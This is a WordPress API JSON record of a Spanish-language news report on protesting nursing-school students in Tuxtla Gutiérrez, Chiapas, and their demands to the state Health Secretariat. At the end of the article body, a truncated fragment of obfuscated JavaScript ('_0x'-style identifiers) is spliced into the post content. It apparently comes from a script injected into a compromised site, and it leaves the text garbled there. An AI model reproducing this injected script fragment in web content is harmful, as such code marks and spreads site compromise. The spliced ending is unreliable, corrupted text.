{"id":12043,"date":"2023-09-30T01:22:18","date_gmt":"2023-09-30T01:22:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12043"},"modified":"2023-09-30T01:22:18","modified_gmt":"2023-09-30T01:22:18","slug":"continua-protestas-de-estudiantes-del-isssech-toman-oficinas-centrales-de-salud","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12043","title":{"rendered":"Contin\u00faa protestas de estudiantes del ISSSECH, toman oficinas centrales de salud"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696027092980-1024x768.jpg\" alt=\"\" class=\"wp-image-12045\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696027092980-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696027092980-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696027092980-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1696027092980.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>29 de septiembre del 2023. Tuxtla Guti\u00e9rrez.- Los estudiantes del Instituto Superior de Estudios de Enfermer\u00eda del Estado de Chiapas ISEEECH realizaron una marcha de sus instalaciones hacia la Secretar\u00eda de Salud en la Colonia Maya Burocr\u00e1tica, para continuar con sus exigencias.<\/p>\n\n\n\n<p>Cabe destacar que, en el onceavo d\u00eda de protestas, se sumaron padres de familia quienes acompa\u00f1aron la caminata.<\/p>\n\n\n\n<p>En esta protesta, los estudiantes y acompa\u00f1antes realizaron una parada en la Avenida Central, en donde exigieron la atenci\u00f3n de las autoridades estatales para este caso.<\/p>\n\n\n\n<p>Los padres de familia expresaron que acompa\u00f1ar\u00e1n a sus hijos, hasta lograr la garant\u00eda de los campos cl\u00ednicos, becas y la destituci\u00f3n del director Celso Antonio Hern\u00e1ndez Prieto.<\/p>\n\n\n\n<p>Cabe destacar que, desde el comienzo de esta protesta, a los estudiantes responsabilizan al director de lo que les pueda ocurrir en el campamento porque dicen que han recibido amenazas, burlas, pero no les ha dado la cara.<\/p>\n\n\n\n<p>Por esta raz\u00f3n, los inconformes realizaron un escrito para dirigirlo al gobernador Rutilio Escand\u00f3n Cadenas, en el que le solicitan la intervenci\u00f3n para que entre el instituto, la Secretar\u00eda de Educaci\u00f3n y la Secretar\u00eda de Salud construyan los espacios para que se generen los campos cl\u00ednicos, con tiempo y de esta manera los j\u00f3venes puedan realizar sus pr\u00e1cticas sin demora.<\/p>\n\n\n\n<p>Agregaron que, la Secretar\u00eda de Salud, no les ha permitido realizar nuestras pr\u00e1cticas profesionales en los hospitales p\u00fablicos por falta de la actualizaci\u00f3n de la Opini\u00f3n T\u00e9cnica Acad\u00e9mica.<\/p>\n\n\n\n<p>Esa es la demanda de los estudiantes que aseguran que no ceder\u00e1n hasta que les hagan caso en sus demandas.<\/p>\n\n\n\n<p>Durante la protesta en la entrada principal de la Secretar\u00eda de Salud, los estudiantes tuvieron un altercado con el personal de esta dependencia que buscaba salir de las instalaciones.<\/p>\n\n\n\n<p>Al menos 4 j\u00f3venes resultaron con heridas leves y rasgu\u00f1os, por el jaloneo entre los dos grupos.<\/p>\n\n\n\n<p>En este escenario, los j\u00f3venes hicieron un llamado a las autoridades para que, este conflicto sea resuelto de una vez por todas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 29 de septiembre del 2023. Tuxtla Guti\u00e9rrez.- Los estudiantes del Instituto Superior de Estudios de Enfermer\u00eda del Estado de Chiapas ISEEECH realizaron una marcha de sus instalaciones hacia la Secretar\u00eda de Salud en la Colonia Maya Burocr\u00e1tica, para continuar con sus exigencias. Cabe destacar que, en el onceavo d\u00eda de protestas, se sumaron padres &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12045,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-12043","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12043","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12043"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12043\/revisions"}],"predecessor-version":[{"id":12046,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12043\/revisions\/12046"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12045"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12043"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12043"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12043"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}